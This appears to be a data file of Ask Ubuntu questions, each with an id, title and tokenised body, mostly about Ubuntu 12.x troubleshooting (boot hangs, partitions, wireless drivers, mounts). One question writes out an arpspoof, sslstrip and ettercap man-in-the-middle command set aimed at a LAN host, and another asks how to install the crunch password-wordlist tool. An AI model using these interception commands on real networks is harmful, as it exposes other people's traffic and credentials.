236384	system hangs up on reboot , gives a bunch of cryptic text	i have a two week-or-so old install of ubuntu 12.04 . i started getting an issue where when i rebooted , it would go to the purple screen with the 5 dots and only the first dot would be colored . nothing happened , so i would have to restart with the button on my tower . i enabled text mode , and it is throwing out these cryptic messages . it only seems to happen after the system has been up for a few minutes . if i boot up and immediately reboot , it works fine and shuts down instantly . i took a few pictures of the messages and linked the imgur album . i tried looking briefly in the logs but i could n't find it in there . sorry about that . album every minute or so the text will update . after about 10 minutes the screen went black . i waited a few more minutes but nothing happened , so i had to use the restart button again . booting up is fine , and nothing seems out of the ordinary once loaded . thanks for looking .
236392	ugly menus after install pantheon	i have this problem about all menus after install pantheon , i do n't have any idea how to fix it . please help me i 'm pretty new to this thing . i know it has to do with the theme or something . thank you all !
236400	text entry box on quickly not working	right now i 'm doing the 'create your first ubuntu app ' youtube tutorial . i 'm trying the text entry box and nothing comes up when i enter text . here 's my code , self.urlentry = self.builder.get_object ( `` urlentry '' ) def on_urlentry_activate ( self , widget ) : print `` woo ! '' when i press enter , or any other button , it does not display 'woo ' on the terminal/command line .
236401	make a wifi repeater ?	my house is wired for ethernet but all the wires come to the basement which is where my dsl modem and my netgear wndr3700v3 wifi router is . i get practically no wifi signal upstairs but i have an acer revo upstairs running ubuntu which is connected to my network with ethernet and has wifi card built in ( though i 'm not using it ) . is there a way i can make this into a repeater ? i 've been reading up about it but there are some things i do n't understand . i read that i need 2 wifi card and one needs have master mode . i do n't understand what this means . i also see that my wndr3700 has an option to be a wireless base station and i can put in the mac address of 4 repeaters . would i need to enable this to work with my revo as a repeater ?
236402	manually partitioning my ssd and hdd	i have a small ssd and a large hdd . i 'm in a similar situation to the following user : what 's a good partition method to combine an ssd boot drive with a 1tb data drive ? in the process of manually partitioning my drives , i encounter a menu that looks like this ( note : i fetched this image from google as an example ) . i have several questions about this menu and about manual partitioning : what does the f character after the partition size indicate in the menu image ? in my case , i also have k and f characters . what do those mean ? ( i 'm assuming b is bootable ) what characters ( properties , whatever ) do i need to have for the root partition on my ssd ? i have indicated where / , swap , and /home go . if i do not make separate partitions for the rest of the top level folders ( /var , /tmp , etc ) , where does it decide to place them ? my setup is based on the opinions i 've gathered throughout these forums : 20gb root partition on ssd , +500gb /home partition on hdd , 16gb swap on hdd ( this was the default size in my case ) .
236404	triple mount , ca n't open storge space	need help , one of my drives is mounted thrice so i ca n't open it . i 'm on a live usb by the way . here are the mounts : here /dev/loop1 on /media/ubuntu/casper-rw type ext2 ( rw , nosuid , nodev , uhelper=udisks2 ) /dev/sdh1 on /media/ubuntu/01cdeac21b6066b0 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda2 on /media/ubuntu/28523cd8523cad06 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb5 on /media/ubuntu/86958578-714f-4f0d-a3c1-9233e6639c6f type ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) /dev/sdb1 on /media/ubuntu/5133366c-bd71-4a09-85e2-bd18788b930d type ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) here /dev/loop1 on /mnt type ext2 ( rw ) and here /dev/loop1 on /media/ubuntu type ext2 ( rw )
236405	is there a command line tool to shrink partition size ?	i have searched around and found this page . but is gui tool . is there a command line tool i can use to shrink one of my partition size disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0009b200 device boot start end blocks id system /dev/sda1 * 2048 60158297 30078125 83 linux /dev/sda2 616775678 625141759 4183041 5 extended partition 2 does not start on physical sector boundary . /dev/sda3 60160000 616773631 278306816 83 linux /dev/sda5 616775680 625141759 4183040 82 linux swap / solaris i would like to resize /dev/sda1 partition
236409	how can i run sublime as a normal user ?	i 've installed sublime text using this method and the installation seems to have went through just fine . however , i ca n't seem to run sublime as a normal user . i can only get it to run when i run it as sudo . sudo subl foo.txt < -- this works subl foo.txt < -- this does n't work
236410	h61m-dgs network issues	i purchased a new motherboard- asrock h61m-dgs and it is having trouble staying connected to the network . i am installing ubuntu server 12.10 and during istallation , it detects the network card and configures it as p2p1 . it works for a while and then quits . the chip is a realtek rtl8111c . i have tried dhcp and a static ip with the same results . ifconfig shows it is up , but i ca n't connect to anything . any ideas ?
236411	can not set 'alt-a ' as shorcut in system shorcuts	i 'm using ubuntu 12.10 and i 'm trying to set a hotkey alt-a , but the alt key highlights the menu bar and so when i press a it goes back to 'all settings ' and does n't set the hotkey . how can i set alt-a as a hotkey ?
236412	sslstrip+arpspoof+ettercap does nothing	here are the commands i use : arpspoof -i wlan0 -t 192.168.1.66 192.168.1.254 sslstrip -a ettercap -t -q -i eth0 but nothing else gets printed such as the packets or requests . i 'm not sure what to do ... i have a compatible wireless card . airmon-ng interface driver chipset wlan0 rtl8187 rtl8187 [ phy0 ] please help ?
236414	how can i install a nautilus script ?	i found a nautilus script i would like to use . how do i install it ?
236417	how does linux or unix like system recognizes files and how is it different from windows ?	i would like to know how does files are recognized by linux/unix . windows makes use of extensions to achieve that . how is it in the unix world ?
236422	tutorial on ubuntu mobile has some error	thanks for the great tutorials . i want to learn ubuntu mobile programming . i followed the tutorial below , http : //developer.ubuntu.com/resources/app-developer-cookbook/mobile/currency-converter-phone-app/ when i run the first code through the 'tools > external > qt quick > preview ( qmlscene ) menu ' , i got error below starting external tool '/usr/bin/qmlviewer ' /home/hanmomhanda/currencyconverter/currencyconverter.qml qml debugging is enabled . only use this in a safe environment ! file : ///home/hanmomhanda/currencyconverter/currencyconverter.qml:1:1 : module `` qtquick '' version 2.0 is not installed import qtquick 2.0 ^ '/usr/bin/qmlviewer ' finished but when i run the same code through terminal using 'qmlscene ~/currencyconverter/currencyconverter.qml ' , it runs ok. how can i use external tools to run the code ?
236424	cp hangs on certain windows files	i am currently trying to use ubuntu 9.04 live cd ( it 's what i had when my computer took a dump ) to copy some windows files from an old drive to a new drive . i 'm using cp -rvf source dest . the issue i 'm having is that during copying , the process will hang on files of varying file extensions ( .exe , .cat , .url ) . when i look at the files that are causing the issue , ubuntu lists their file type as `` pipe '' . i 'm not having this issue with all files having these extensions , only the ones that ubuntu thinks is a `` pipe '' . looking at the files i ca n't determine any pattern to why filea.exe is identified as a program while fileb.exe is identified as a pipe . how do i get cp to stop hanging on these files and/or get ubuntu to always properly identify these file types ?
236425	how to enable logging for google chrome in ubuntu 12.04 ?	i 'm trying to capture the logs for a certain bug i 'm having with google chrome . however , i ca n't find/enable logs for gc . according to this chromium project page , i just need to add the flags -- enable-logging -- v=1 and a chrome_debug.log file will appear in my user data directory . however , after running gc ( and closing through the 'x ' title bar button ) there is no chrome_debug.log file in the specified directory . i even tried running as root as it may have something to do with write permissions but gc refuses to start as root . another thing , gc also prints messages when invoked from command line . i tried capturing this and redirecting them to a file via $ google-chrome > today.log but the messages are still printed in the command line and the file i specify gets created but remains empty . note that i ca n't just copy-paste the messages printed on terminal after my bug occurs as the bug freezes up my whole system that , when it occurs , my only option is to turn off my computer straight via the power button . i 've seen a few similar bugs already posted but i find that they do n't exactly describe my situation so i 'd really like to get some logs for this . so how do i enable logging or , at least , get those terminal messages in a file ?
236426	why ca n't i boot ubuntu ?	i have to two operating systems in my computer . ubuntu in d drive and windows 7 in c drive . now i replaced window 7 with window 8 but i ca n't load both the windows simultaneously.. how i can resolve this problem ? ?
236428	would i be able to sync a recent samsung android phone with kubuntu ?	i 'm trying to be a good consumer here and do plenty of research before i purchase , unfortunately it seems like either i 'm not looking in the right places or the information is n't there . i 'm considering purchasing a samsung note ii or galaxy iii phone . the problem apparently is that excepting cloud sync or mass storage devices , there 's no way to make the android phone talk to my kubuntu 12.04 system to sync calendar and contacts , and various other things . i 'm an eclectic person i scatter out quite a bit and google for all the wonder things it does , is completely useless for me and my particular lifestyle . obviously i 'm in the minority . what i need is ( hopefully ) someone who 's already dealt with this and can provide steps to fix it or to be told to give it up as a lost cause and get either a hated windows phone or see if i can find an old palm pilot on ebay and use my cheap flip phone for just phone calls . thanks in advance for any answers . thanks for the answers , transferring files is all well and good , but what i really need it to do is synchronize my contact and calendar data when i plug it in to my computer . apparently unless i rearrange my life to use google contacts and calendar ( which i 'm not willing to do ) this is not possible any longer with new technology , which is kind of sad . for an almost eight hundred dollar phone that does all sorts of wonderful things , the extreme lack of basic functionality is disappointing .
236430	what are some good developer resources for qml/qt quick ?	i have seen the tutorial for the mobile platform on the ubuntu developer site , but i am completely new to the qt stack . are there any other good resources for getting started with qt/qml/qt quick ?
236432	how to install crunch wordlist ?	how to install crunch wordlist on 12.10 32-bit ? crunch 3.4 wordlist i used tar -zxvf crunch-3.4.tgz cd crunch-3.4 sudo make sudo makeinstall a directory /pentest/passwords/crunch was created but i can not seem to know how to run crunch .
236435	ubuntu 12.10 live using grub	someone can tell me how to boot ubuntu 12.10 from grub , i tried a lot but still getting error message can not mount ( hdx , msdosx ) /ubuntu.iso .
236436	how to make nautilus forget saved password ?	i am browsing shared folders on a windows network through samba . when i first opened a system on the network i was asked for a login username , password and i checked the save-password setting . now the shared folder opens directly without asking for authentication . i want to browse the folder using a different user which has more access rights . how should i do that ?
236438	ubuntu 12.10 does not see my ipod nano 8gb 4 gen	when i plug my ipod into my computer it does not display it in my home folder or on the sidebar , but 12.04 does . why ?
236443	how to install ubuntu on acer aspire s3 use usb stick ?	how to install ubuntu12.04 on acer aspire s3 use usb stick ? i ca n't see any thing , screen is black . but i can hear voice . could anyone help me ? please .
236446	how do you create a program launcher with administrative privileges using alacarte ?	how do you create a program launcher with alacarte ( main menu ) that has administrative privileges ? i ask because i seem to have deleted the launcher for synaptic package manager and whenever i start it with the command , 'synaptic ' i have to run it without administrative privileges . as in , what do i type into , 'command ' to run synaptic package manager with administrative privileges in the following screenshot :
236452	not able to open phpmyadmin	i installed phpmyadmin , root @ prakash-rv411-rv511-e3511-s3511-rv711 : ~ # sudo dpkg -- get-selections | grep phpmyadmin phpmyadmin install but when i start apache 2 and enter localhost/phpmyadmin in the url i get a 404 error .
236455	how can you delete only gps metadata from a jpeg file ?	i ( think i ) can delete all gps information from jpeg file 's metadata by exiftool -gps : all= -xmp : all= filename.jpg but that deletes all xmp metadata . is there a way to delete only gps information from xmp metadata ( and from any other metadata group ) by not designating individual gps tags separately ?
236459	ca n't boot into ubuntu ?	i dual booted windows 8 and ubuntu 12.04 ( 64 bit ) recently , everything was running fine , no errors except ubuntu crashed in unity 3d mode but worked fine with 2d . yesterday , i was showing windows 8 to my cousins ( i hardly use windows 8 anymore ) after an hour of use i restarted the computer to boot into ubuntu , but ubuntu did n't boot . i even tried boot-repair using live usb ( i thought it might work after boot repair , but it did n't ) . what should i do now ? grub wo n't even load , the system directly boots into windows 8 . also , the system had windows 8 pre-installed .
236463	my /opt directory is empty and the app lens is not working , what should i do ?	i have 12.10 installed , and i was searching for transmission one day in the apps lens . it did n't show up , and i was confused ; i began searching more in the lens and realized no apps were showing up . as an alternative , i began using the terminal . but since this is n't a real option , and i was confused by the title of the programs ( i di n't even know it was chromium-browser instead of just chromium ! ) . after this , i decided to search for the programs , and where they were installed - so i could execute them that way . checking this chapter on the heirarchy of the linux filesystem , i found that the /opt directory was most suitable after reading the description . however , the results of my exploration were not as i had hoped . i navigated to the filesystem and opened the /opt directory . i was surprised to see there was nothing in the folder . no other folders , no files , nothing . i confirmed that i was allowed to access the file in there , and had sure to check for hidden files and folders . i can open any applications when i run the command in a terminal , and i have been pining them for easy access . they open as normal .
236464	ubuntu does not keep settings for dual-monitor setup , how can i correct this ?	first i have a windows 8 pc with two monitors attached : a 24 '' primary monitor at 1920 x 1200 , and a second 19 '' monitor at 1280 x 1024 . windows boots using the smaller 19 '' monitor before eventually adopting the saved configuration : 24 '' as primary , 19 '' as secondary . ubuntu does more or less the same , booting on the 19 '' then using both monitors . after ubuntu installation the desktop is mirrored across both . i switch this option off and then set up the correct resolutions . i then adjust the position of the monitors using the utility provided . everything is good and lovely . however , the next time i fire up ubuntu ( restart or cold boot ) the settings have been lost and something else is adopted . that is does n't seem consistent . sometimes it will confuse the 24 '' unit and result in a display that , whilst reported to be 1920 x 1200 - is way off the screen by some distance . what 's worse , sometimes the displays are completely corrupt and there is no choice but to physically reset the computer . i really want to get this working so any help would be welcome . for reference my specifics are listed below : my graphics card is a geforce 9500gt , the bios 62.94.80.00.00 and win 8 drv:9.18.13.0697 , the monitors are : acer al2416w ( analog input only ) , and a viewsonic vg910b ( digital input used ) , the motherboard is gigabyte 965p-s3 , the cpu is e6420 core 2 duo , 4gb of ram . ubuntu iso is 12.10-desktop-i386.iso installed alongside windows 8 . i am using the default desktop . incidentally , ubuntu correctly identifies each monitor when using the display settings utility but does n't automatically select the native resolution for the 24 '' unit . this has to be manually selected from the drop down list .
236465	mount canon 500d	when i plug my canon 500d camera into the usb port of my ubuntu pc it shows the camera in the files , and i can see the images on the camera , but if i try to copy any of them to the pc , nothing happens , the progress bar stays at 0 and never gets any further . i have installed gphoto2 as someone suggested , but now i dont know what to do , i cant find any icon for it and the camera still behaves the same . i have installed gtkam as someone suggested too , but again it still behaves the same . i got the gtkam software to run at the command line , but when this happens i can detect the camera , but when i say 'apply ' or 'save ' , i get an error saying it can not mount . all i want to do is copy files from the camera to the pc any suggestions ?
236466	12.10 hangs on ubuntu loading screen	been trying to install ubuntu 12.10 on my toshiba satellite c855d . specs are 2.7 ghz amd with built in radeon graphics card . the same iso that i am currently trying to install has been used to install ubuntu on 2 other laptops one hp and one toshiba . when i press the function keys while the screen is loading it shows me what action is being taken . the load stalls out at the message `` starting crash report submission daemon '' , any help troubleshooting this issue would be great . thank you , usaf_hebbes my computer boots to a black screen , what options do i have to fix it ? does not fix this issue .
236467	ubuntu 12.10 wireless is not working	i am new to ubuntu . i had installed ubuntu 12.10 on my laptop . wireless is not working . it is not detecting the available networks . i am able to connect through wire . please help me in connecting through wifi . arun @ arunan : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) arun @ arunan : ~ $ sudo lshw -c network *-network unclaimed description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : f69fc000-f69fffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : a4 : ba : db : de : ce : a2 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.2.9 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:45 ioport : de00 ( size=256 ) memory : f0010000-f0010fff memory : f0000000-f000ffff memory : f0020000-f003ffff arun @ arunan : ~ $ rfkill list all arun @ arunan : ~ $ the model is dell inpsiron 1440 below are the results which i got when i boot through the live usb and connect to the wireless . $ sudo lshw -c network *-network description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : eth1 version : 01 serial : 0c:60:76:65 : ce : e2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.112 ip=192.168.2.10 latency=0 multicast=yes wireless=ieee 802.11bg resources : irq:17 memory : f69fc000-f69fffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : a4 : ba : db : de : ce : a2 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:45 ioport : de00 ( size=256 ) memory : f0010000-f0010fff memory : f0000000-f000ffff memory : f0020000-f003ffff
236468	f ? ( f.e . f8 ) shortcuts not working in geany	i 'd like to ask for tips why shortucts f.e . for build f9 or compile f8 are not working in geany text editor . i tried to assign different shortcuts including ctrl+f8 or ctrl+shift+b and none of them worked .
236474	existing windows software help	can i run my existing pc software such as solidworks , autocad , ptc creo parametric , etc. , on ubuntu without any sort of help from a windows os ? or do i have to download a separate linux version to run them on ubuntu ? please help .
236476	how do i diagnose hang on shutdown ?	since one or two months ago , my laptop with ubuntu 12.10x64 hangs during shutdown . there 's just a black screen , no harddisk activity , it justs sits there . i feel it happens near the end of a normal shutdown cycle , judging from time elapsed . only resolution is hard power-off ( holding power key for several seconds ) - neither ctrl-alt-backspace ( which normally works , i have it switched on in settings ) nor ctrl-alt-del help , nor can i get into a text console with ctrl-alt-f1 . how do i diagnose that ? it does not happen on every shutdown , but often enough to be annoying ( as it forces a diskcheck on reboot , of course ) . which log files can tell me what 's going wrong ? more or less blindly searching in the sys log viewer reminds me of needles in a haystack . i imagine i could pinpoint the time it happens via log timestamps , but how do i read timestamps like e.g . in kern.log : [ 36169.146130 ] ? how do i get this human-readable ? lastly , a bit of a btw , i 've never managed to execute an alt-sysrq-reisub to force a cleaner shutdown , but that 's probably because i 'm on a laptop , printscr is only accessible via an fn key , and i 'm not sure of the exact key sequence i need . is there a `` harmless '' but user-visible magic command i could practice this with ( during normal operation ) , so i can find out how to do a reisub next time ? thanks all ! comment if you need additional data ...
236478	how do i make bash warn me when overwriting an existing file ?	i think the title is pretty self-explanatory . all i want is bash to warn me whenever i attempt to overwrite an existing while using cp or mv . i 'd really appreciate some help . : )
236480	hdmi with hda intel problem	in my hp pavilion dv7 the hdmi sound does not work ( image works correctly ) . i enabled this from the `` audio '' panel but sound still comes out from the integrated speakers . i tried to enable the s/pdif-1 ( i found this in some how-tos on internet ) from the alsamixer and also tried o update the alsa drivers , but they appear to be up to date . i am a simple linux user , not a guru , and i do n't know now what could be the problem . every suggestion would be appreciated . stefano
236487	12.10 error after login -evolution calendar	why do i , after having installed ubuntu 12.10 for nearly 3 months , still every second log-in have this evolution epiphany calendar error . i know more people have this issue . all upgrades applied , 3 months passed , i 'm sending reports every time errors appear and no one can do anything with it there at canonical ? ps . i read the log that being send to canonical and theres the following written `` no upgrades applied , probably fresh install '' which is n't true , because i apply all upgrades available , since fresh install was like 250mb or so . why is n't this fixed yet ?
236489	how to make unity top panel semi-transparent ?	how do i make the top bar on the screen semi-transparent , like the launcher on the left ?
236495	installed ubuntu 12.10 but ca n't login due to gpu lock and i ca n't boot with nomodeset because i get no grub menu . what can i do ?	i 'm a complete noob to ubuntu/linux . obviously ubuntu is having trouble with my nvidia card and thus produces graphics glitches and craziness at the login screen . i tried pressing shift on bootup in order to boot with nomodeset but did n't get any grub menu . i can however boot my live usb stick with nomodeset . can i install the proper gpu drivers ( or restore the grub menu ) onto my hdd-installed ubuntu from the live usb somehow ? and if so , how ? if you have a solution , please explain it to me like i 'm five - i 'm really not proficient at this stuff at all ! thanks in advance for any advice !
236498	how can i share all of my ubuntuone photo albums in one go ?	currently i can share each album one at a time . how can i share them all at once ?
236499	what native gui applications can easily make a photo collage grid ?	despite being an ubuntu user for many years , for several years i have been using picasa on windows to make photo collage grids of my photos . the process for doing this is to select either a folder of photos or a number of photos and press the `` create collage '' button . the photos are usually arranged by date taken ( which i prefer ) , but this can be changed by manually rearranging them . the results look like this : click here for a bigger version is there native software - i.e . does n't require wine or run in a browser - with a gui ( for easy editing ) available for ubuntu that can make collages in the same way ?
236501	why ca n't i get all reviews for this app in the ubuntu software center using the json api ?	i have a question after reading this : is there any web api for software center available ? i am trying to understand the ubuntu software center 's json endpoints . this json lists all the apps available from the software center : http : //software-center.ubuntu.com/api/2.0/applications/any/ubuntu/any/any/ cool ... now i need to get all review for one app ! so i choose an app and get its packages_name from the json file : { `` status '' : `` published '' , `` package_name '' : `` splashtop-streamer '' , `` video_embedded_html_urls '' : [ `` http : //myapps.developer.ubuntu.com/dev/apps/1804/video/264a5fb11b60410a3a7d03bebdd1fcccd0cf5a72/ '' ] , ... . here the package_name is splashtop-streamer . to gets all reviews for the vlc app i just do this : https : //reviews.ubuntu.com/reviews/api/1.0/reviews/filter/any/ubuntu/any/any/vlc but for splashtop-streamer app i ca n't : https : //reviews.ubuntu.com/reviews/api/1.0/reviews/filter/any/ubuntu/any/any/splashtop-streamer it only returns this : [ ] if you look at splashtop-streamer online , you 'll see that it does indeed have reviews . so why is the api returning an empty list ?
236504	how can i bypass a wireless switch which is broken on a sony vaio vgn-fw31e ?	i am running dual boot ubuntu 12.10 and window 7 on a sony vaio vgn-fw31e . the wireless switch has broken and come away from the motherboard , which switches it to the permanently off state . i have removed the mini pci express wireless card intel 5100 series and blanked off pin 20 which switches off the card ( on is low ) . the wireless now works fine in windows 7 but not in ubuntu . as i only use windows 7 to browse one poorly designed website i would really like to get my wireless card running in ubuntu . rfkill list all returns the following : 0 : sony-wifi : wireless lan soft blocked : no hard blocked : yes 1 : sony-bluetooth : bluetooth soft blocked : no hard blocked : yes 2 : phy0 : wireless lan soft blocked : no hard blocked : no any ideas ?
236507	how to use audio recorder to record tracks in separate files ?	i have installed audio recorder to record sounds played by my computer . sudo apt-add-repository ppa : osmoma/audio-recorder sudo apt-get update sudo apt-get install audio-recorder i want it to create separate files after several seconds of silence , like for tracks . it has a lot of possible settings especially by activating the `` timer '' . but , under my current settings , stopping after silence ( `` stop if silence '' ) and restarting recording if sound is played ( `` start if sound '' ) would continue recording in the same file . i want it to continue in a new file each time . that would increase the probability of recording separate audio parts/songs as separate files . i have uploaded here the timer syntax help ( also available after installation clicking the button beside timer options ) .
236508	can i print to an epson expression xp-102 ?	i own a epson expression xp-102 , but i can not find a way to make it work . i am new to ubuntu . is there any way to make print to the epson expression ?
236511	can i run a 12.04 64-bit server with only 1gb ram ?	my friends ask me to build him a web server with 12.04 64-bit server edition in his 1gb ram server . is it recommended or safe ? because i heard 64-bit system need at least 2gb ram .
236513	why does ubuntu 12.04 unity suddenly blur text and images ?	today after a reboot , ubuntu blurs text ( well , anything that is rendered on screen ) whenever focus changes or on any interactions with the desktop . example : normal good look : blurred state : note how the text , folders and the plus signs left of the folders are somewhat blurred . in this case , the normal state is after opening the window . blur happens on lost focus , and gets normal again whenever something is redrawn this applies to anything that is drawn . even in 3d games , text and thin lines flicker between normal and blurred intermittently , or whenever desktop interaction happens . i have ruled out anything to do with font smoothing , this seems to be opengl-related . does not occur if i switch to unity 2d or gnome , but then again , that 's not what i want to use . this just in : as it happened , the issue fixed itself while typing this question , after compiz crashed and restarted itself while trying to provoke the issue . strange , seeing how the issue survived several reboots .
236519	unable to group chat on facebook with empathy ?	i ca n't take part in a facebook group chat with empathy . do you know if there is a solution for this issue ?
236520	folders ' content does n't refresh automatically	i 'm having the following issue on a fresh install of 12.10 . basically if i create a file in a folder through a software ( say , gimp , or libre ) , and i have nautilus open as well , i do n't see the file appearing in nautilus . i have to close nautilus , or switch to another folder and then switch back to the first folder ... make sense ? i 'm not sure where to look/what to do to fix . alex
236526	recover hard disk from accidentally formate in ubuntu installation	i am very new to ubuntu . during ubuntu installtion , i choose an option that allow ubuntu ( 12.10 ) to replace my window 7 without knowing that it will formate and repartition my hard disk . then , all my important files are gone . could you please tell me how can i get my files back ? or if possible , could i recover all partition back ? your help will be appreciated .
236529	binding back/forward to mouse buttons	i have a basic logitech mouse with 5 buttons : left , right , wheel left , wheel , wheel right . i used to use wheel left and right for going back and forward in my browser or navigator . now this does n't work . i 've found many solutions , people telling to install this program or that , did n't seem to work . regards , brent
236533	how to change the menu icon of mate desktop menu applet ?	i am using the mate desktop environment v-1.4.1 and having a mate-menu applet in the bottom panel : shutdown [ icon ] applications places system . see screenshot below . is there any way to change or remove the [ icon ] on the left of the applications menu ? where does mate take this from ? i noticed the inon changes when using different icon-themes but i do n't understand how to customize only this single icon .
236535	automatic incremental backups to an encrypted external hard disk	what is the best way to do automatic incremental backups ( and if possible to store more than a single version of the same file ) to an external usb hard disk with full hard disk encryption ? i do n't want to use the ubuntu backup utility ( that provide an encryption feature ) because i tested it and it seems really resources intensive and it is not really useful if i need to browse my backup searching for a specific file . i 'm thinking about rsync and cron on a external hard disk with a encryptfs partition but probably there is something better . i also need to automate in some way the mount/umount process because i do n't want to type the password every day to let the backup begin thank you ! : - )
236536	ubuntu read wrong my windows	can anybody help me ? ? i tried to instal ubuntu 12.10 alongside with my windows 7 .. but when the option allocate drive , the option is instal alongside windows 8 ? ? why ? but my os is windows 7 .. when i try to click restart to continue , it 's restarting ... but when it 's done , the option change to continue , i try to click but just error i found it 's just restarting again and again ... i see error log is error compatibility what should i do ? ? is my windows has error or what ? ?
236543	ca n't upgrade to ubuntu 12.10 - radeon 7470m issue	firstly : happy new year ! i have a hp dm4-3060ef and it works great with ubuntu 12.04 . i 'd like to use 12.10 for different reasons ( its a little bit faster and i like webapps - even in a developer side ) i 've tried many times now to upgrade and it never works because the radeon graphics card ( 7470m ) . it seems that the fglrx drivers are not compatible with the new xorg version . i tried to install amd 12.11 beta drivers but i ca n't make them work . i 'm really surprised to not find many people complainig about this issue with amd drivers online . has someone managed to make this card work in 12.10 ? thanks for your help . dominique . ps : sorry for my english ... i 'm a french guy : - )
236544	can not see my external drive	hi i ca n't see my usb external hard drive . with disk utility it says it 's mounted . but i ca n't find it on the right of nautilus file explorer . when i try to mounted again , obviously it says it 's mounted already . it gave me the error . mount : according to mtab , /dev/sdc1 is already mounted on / i google around but did n't find any answer . my disk works fine on win xp . here is what fdisk -l says : disk /dev/sda : 360.1 gb , 360080695296 bytes 255 heads , 63 sectors/track , 43777 cylinders , total 703282608 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes /o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x63ce5f06 device boot start end blocks id system /dev/sda1 16065 682891019 341437477+ f w95 ext 'd ( lba ) /dev/sda2 * 682891020 703277504 10193242+ 7 hpfs/ntfs/exfat /dev/sda5 16128 682891019 341437446 7 hpfs/ntfs/exfat disk /dev/sdc : 360.1 gb , 360080695296 bytes 255 heads , 63 sectors/track , 43777 cylinders , total 703282608 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2357d1b7 device boot start end blocks id system /dev/sdc1 * 2048 690995199 345496576 83 linux /dev/sdc2 690997246 703281151 6141953 5 extended /dev/sdc5 690997248 703281151 6141952 82 linux swap / solaris disk /dev/sdb : 1500.3 gb , 1500299395072 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930272256 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000822c7 device boot start end blocks id system /dev/sdb1 2048 2930272255 1465135104 7 hpfs/ntfs/exfat here 's what more /etc/fstab says : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < 